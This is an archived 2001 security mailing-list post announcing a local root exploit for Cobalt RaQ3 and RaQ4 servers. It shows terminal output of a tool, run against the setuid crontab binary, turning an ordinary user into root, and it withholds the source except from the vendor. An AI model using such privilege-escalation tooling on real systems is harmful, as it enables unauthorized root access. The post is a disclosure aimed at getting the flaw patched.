[cobalt-security] NEW local exploit
- Subject: [cobalt-security] NEW local exploit
- From: Peter Batenburg <peter@xxxxxxxxxx>
- Date: Sun, 15 Apr 2001 15:31:27 +0200
- List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>
Hello,
Today I got a nice new local root exploit from a friend of mine. It gives
local root in an instant with every kernel and setuid executable available
(even 2.4).
Proof:
[host host]$ id
uid=131(host) gid=100(users) groups=100(users),111(site-adm),119(site8)
[host host]$ ./prak /usr/bin/crontab
bug exploited successfully.
enjoy!
bash# id
uid=0(root) gid=0(root) groups=100(users),111(site-adm),119(site8)
bash#
This is with a RaQ4r: Linux ********** 2.2.14C11 #2 Wed Jun 28 00:55:51 PDT 2000 i586 unknown
On a RaQ3: Linux ******** 2.2.14C10 #3 Wed Jun 21 15:05:10 JST 2000 i586 unknown
[bb@***** bb]$ id
uid=174(bb) gid=100(users) groups=100(users)
[bb@***** bb]$ ./prak /usr/bin/crontab
bug exploited successfully.
enjoy!
bash# id
uid=0(root) gid=0(root) groups=100(users)
bash#
Hopefully Cobalt will release a patched kernel within some weeks.
People from Cobalt can contact me for the source.